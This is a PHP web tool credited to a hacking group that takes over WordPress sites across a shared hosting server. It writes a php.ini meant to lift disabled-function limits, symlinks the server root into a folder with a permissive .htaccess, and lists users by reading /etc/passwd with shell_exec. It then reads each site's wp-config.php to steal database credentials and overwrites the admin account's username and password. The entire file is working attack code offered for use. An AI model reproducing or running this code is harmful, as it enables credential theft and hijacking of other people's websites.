wordpress mass username/password changer

1. <?php
2.  
3.  
4.  
5.  
6. $head = '
7. <html>
8. <head>
9. </script>
10. <title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>
11. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
12.  
13. <STYLE>
14. body {
15. background-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");
16. background-position: center center;
17. background-repeat: no-repeat;
18. background-size: 400px 650px;
19. background-color: #000000;
20. background-attachment: fixed;
21. font-family: Tahoma
22. }
23. tr {
24. BORDER: dashed 1px #333;
25. color: #FFF;
26. }
27. td {
28. BORDER: dashed 1px #333;
29. color: #FFF;
30. }
31. .table1 {
32. BORDER: 0px Black;
33. BACKGROUND-COLOR: Black;
34. color: #FFF;
35. }
36. .td1 {
37. BORDER: 0px;
38. BORDER-COLOR: #333333;
39. font: 7pt Verdana;
40. color: Green;
41. }
42. .tr1 {
43. BORDER: 0px;
44. BORDER-COLOR: #333333;
45. color: #FFF;
46. }
47. table {
48. BORDER: dashed 1px #333;
49. BORDER-COLOR: #333333;
50. BACKGROUND-COLOR: Black;
51. color: #FFF;
52. }
53. input {
54. border : dashed 1px;
55. border-color : #333;
56. BACKGROUND-COLOR: Black;
57. font: 8pt Verdana;
58. color: Red;
59. }
60. select {
61. BORDER-RIGHT: Black 1px solid;
62. BORDER-TOP: #DF0000 1px solid;
63. BORDER-LEFT: #DF0000 1px solid;
64. BORDER-BOTTOM: Black 1px solid;
65. BORDER-color: #FFF;
66. BACKGROUND-COLOR: Black;
67. font: 8pt Verdana;
68. color: Red;
69. }
70. submit {
71. BORDER: buttonhighlight 2px outset;
72. BACKGROUND-COLOR: Black;
73. width: 30%;
74. color: #FFF;
75. }
76. textarea {
77. border : dashed 1px #333;
78. BACKGROUND-COLOR: Black;
79. font: Fixedsys bold;
80. color: #999;
81. }
82. BODY {
83. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
84. margin: 1px;
85. color: Red;
86. background-color: Black;
87. }
88. .main {
89. margin : -287px 0px 0px -490px;
90. BORDER: dashed 1px #333;
91. BORDER-COLOR: #333333;
92. }
93. .tt {
94. background-color: Black;
95. }
96.  
97. A:link {
98. COLOR: White; TEXT-DECORATION: none
99. }
100. A:visited {
101. COLOR: White; TEXT-DECORATION: none
102. }
103. A:hover {
104. color: Red; TEXT-DECORATION: none
105. }
106. A:active {
107. color: Red; TEXT-DECORATION: none
108. }
109. </STYLE>
110. <script language=\'javascript\'>
111. function hide_div(id)
112. {
113. document.getElementById(id).style.display = \'none\';
114. document.cookie=id+\'=0;\';
115. }
116. function show_div(id)
117. {
118. document.getElementById(id).style.display = \'block\';
119. document.cookie=id+\'=1;\';
120. }
121. function change_divst(id)
122. {
123. if (document.getElementById(id).style.display == \'none\')
124. show_div(id);
125. else
126. hide_div(id);
127. }
128. </script>'; ?>
129. <html>
130. <head>
131. <?php
132. echo $head ;
133. echo '
134. <div align=center><font color=white font size=4><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special f**k goes to my best buddy "Suriya CyberTyson" <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div>
135. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
136.  
137.  
138.  
139. <td width="100%" align=center valign="top" rowspan="1">
140. <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Code Breaker ICA ]]==--</font><font color=white size=5 face="comic sans ms"><b><br> <font color=#ff9933 size=5 face="comic sans ms">--==[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> w0rdpress mass </font><font color=white size=5 face="comic sans ms">admin panel username/pasword </font><font color=green size=5 face="comic sans ms"><b>changer By Team IndiShell <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]==--</font> <div class="hedr">
141.  
142. <td height="10" align="left" class="td1"></td></tr><tr><td
143. width="100%" align="center" valign="top" rowspan="1"><font
144. color="red" face="comic sans ms"size="1"><b>
145. <font color=#ff9933>
146. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br> Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Striker india,cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>
147.  
148. <font color=white>--==[[Dedicated to]]==--</font>
149. <br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Deepika Kaushik</font><br><font color=#ff9933>
150. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
151.  
152. </table>
153.  
154. </table>
155. ';
156. ?>
157. <body bgcolor=black><h3 style="text-align:center">
158. <form method=post><font color=white size=3 face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
159. <input type=submit name=ini value="use to Generate PHP.ini" /></form>
160.  
161. <?php
162. if(isset($_POST['ini']))
163. {
164.  
165. $r=fopen('php.ini','w');
166. $rr=" disbale_functions=none ";
167. fwrite($r,$rr);
168. $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
169. echo $link;
170. echo "<br>";
171. }
172.  
173.  
174.  
175. ?>
176. <div align=center><table width=60%><tr><td align=center><a href="<?php echo '?whole'; ?>"><font color=white size=3 face="comic sans ms">change user/pass for whole server</font></a></td><td align=center><a href="<?php echo '?particular'?>"><font color=white size=3 face="comic sans ms">change user/pass for particualr users</a></font></td></tr></table><br>
177.  
178. <?php
179. if(isset($_GET['whole']))
180. {
181. echo "<font color=white size=3 face=\"comic sans ms\">bhai ji , please fill the username/password that you want to set on admin panels :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">";
182. echo "username:<input type=text name=uname value=Team><br>";
183. echo "Password<input type=text name=pass value=INDISHELL></font><br>";
184. echo "<input type=submit name=start value=\"start 8-)\"><p>";
185.  
186. }
187. ?>
188. <?php
189. error_reporting(0);
190. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
191. {
192.  
193. $ar0=explode($marqueurDebutLien, $text);
194. $ar1=explode($marqueurFinLien, $ar0[1]);
195. $ar=trim($ar1[0]);
196. return $ar;
197. }
198.  
199.  
200. if(isset($_POST['start']))
201. {
202.  
203. $uname=$_POST['uname'];
204. $pass=$_POST['pass'];
205.  
206.  
207. ////////////////////////////////////////////////////////
208. /////////////////// symlink ///////////////////
209. ////////////////////////////////////////////////////////
210.  
211. mkdir('Indishell',0777);
212. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
213. $g = fopen('Indishell/.htaccess','w');
214. fwrite($g,$rr);
215. symlink("/","Indishell/root");
216. if(!is_dir('Indishell/root'))
217. {
218. echo "sorry bhai ji , script could not symlink / folder :( ";
219. }
220. else
221. {
222. $cmd="awk -F : '($3>500) && ($3!=65534) && ($3!=1000)' /etc/passwd | cut -f 1 -d ':' ";
223. $c=shell_exec($cmd);
224. $usr=explode("\n",$c);
225. foreach($usr as $us )
226. {
227.  
228. $u=trim($us);
229.  
230. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/Indishell/root/home/';
231. $confi=array("wp-config.php","blog/wp-config.php","wordpress/wp-login.php");
232. foreach($confi as $co)
233. {
234. $uurl=@file_get_contents($base_url.$u."/public_html/".$co);
235.  
236. if($uurl && preg_match('/DB_NAME/i',$uurl))
237. {
238.  
239. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user $u </font></td></tr></table>";
240. $wl=$base_url.$u."/public_html/".$co;
241. $text=file_get_contents($wl);
242.  
243. $uname=$_POST['uname'];
244. $dbu=entre2v2($text,"define('DB_USER', '","');");
245. $dbp=entre2v2($text,"define('DB_PASSWORD', '","');");
246. $dbn=entre2v2($text,"define('DB_NAME', '","');");
247. $tp=entre2v2($text,"$table_prefix = '","'");
248.  
249. $npwd= md5($pass);
250. $host="localhost";
251. $dbconnect=@ mysql_connect($host,$dbu,$dbp);
252. $dbselect=@ mysql_select_db($dbn,$dbconnect);
253. if($dbselect)
254. {
255. echo "<font color=red>database $dbn has been selected<br>";
256.  
257. $ru=@ mysql_query("UPDATE `".$tp."users` SET `user_login` ='".$uname."' WHERE ID = 1") ;
258. $ru= @ mysql_query("UPDATE `".$tp."users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;
259. $req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'");
260. $data = mysql_fetch_array($req);
261. $site_url=$data["option_value"];
262. echo "website is ".$data["option_value"];
263. if(!$ru)
264. {
265. echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
266. }
267. else {
268.  
269. echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
270. }
271.  
272. }
273. }
274. }
275. }
276. }
277.  
278.  
279. }
280. ?>
281. <?php
282.  
283. if(isset($_GET['particular']))
284. {
285.  
286. ?>
287. <font size=3 color=white face="comic sans ms">Put the wordpress website usernames for mass user/password change<br></font>
288. <form method=post>
289. <font size=3 color=white face="comic sans ms"> username:<input type=text name=uname value=Team><br>
290. Password<input type=text name=pass value=INDISHELL></font><br>
291. <font color=red size=3 face="comic sans ms">user list<br><textarea rows=6 cols=45 name=wen></textarea>
292. <br><br><input type=submit name=cant value="bhaiyu.... click me and i will try to hex this shit XD" /></form><p>
293. <?php
294. }
295. ?>
296. <?php
297. if(isset($_POST['cant']))
298. {
299.  
300. error_reporting(0);
301. $uname=$_POST['uname'];
302. $pass=$_POST['pass'];
303.  
304. $users=$_POST['wen'];
305.  
306. mkdir('Indishell',0777);
307. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
308. $g = fopen('Indishell/.htaccess','w');
309. fwrite($g,$rr);
310. symlink("/","Indishell/root");
311. $use=explode("\n",$users);
312.  
313.  
314.  
315. foreach($use as $us){
316. $u=trim($us);
317. echo "<font color=red size=3 face=\"comic sans ms\">".$u;
318. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/Indishell/root/home/';
319. $confi=array("wp-config.php","blog/wp-config.php","wordpress/wp-login.php");
320. foreach($confi as $co)
321. {
322. $uurl=@file_get_contents($base_url.$u."/public_html/".$co);
323.  
324. if($uurl && preg_match('/DB_NAME/i',$uurl))
325. {
326.  
327. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user $u </font></td></tr></table>";
328. $wl=$base_url.$u."/public_html/".$co;
329. $text=file_get_contents($wl);
330.  
331. $uname=$_POST['uname'];
332. $dbu=entre2v2($text,"define('DB_USER', '","');");
333. $dbp=entre2v2($text,"define('DB_PASSWORD', '","');");
334. $dbn=entre2v2($text,"define('DB_NAME', '","');");
335. $tp=entre2v2($text,"$table_prefix = '","'");
336.  
337. $npwd= md5($pass);
338. $host="localhost";
339. $dbconnect=@ mysql_connect($host,$dbu,$dbp);
340. $dbselect=@ mysql_select_db($dbn,$dbconnect);
341. if($dbselect)
342. {
343. echo "<font color=red>database $dbn has been selected<br>";
344.  
345. $ru=@ mysql_query("UPDATE `".$tp."users` SET `user_login` ='".$uname."' WHERE ID = 1") ;
346. $ru= @ mysql_query("UPDATE `".$tp."users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;
347. $req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'");
348. $data = mysql_fetch_array($req);
349. $site_url=$data["option_value"];
350. echo "website is ".$data["option_value"];
351. if(!$ru)
352. {
353. echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
354. }
355. else {
356.  
357. echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
358. }
359.  
360. }
361. }
362.  
363. }
364. }
365.  
366.  
367. }
368. ?>